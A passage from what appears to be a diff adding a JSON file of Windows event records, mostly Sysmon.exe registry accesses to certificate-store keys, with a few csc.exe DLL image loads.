"CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859650000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
+ "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": 
"Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 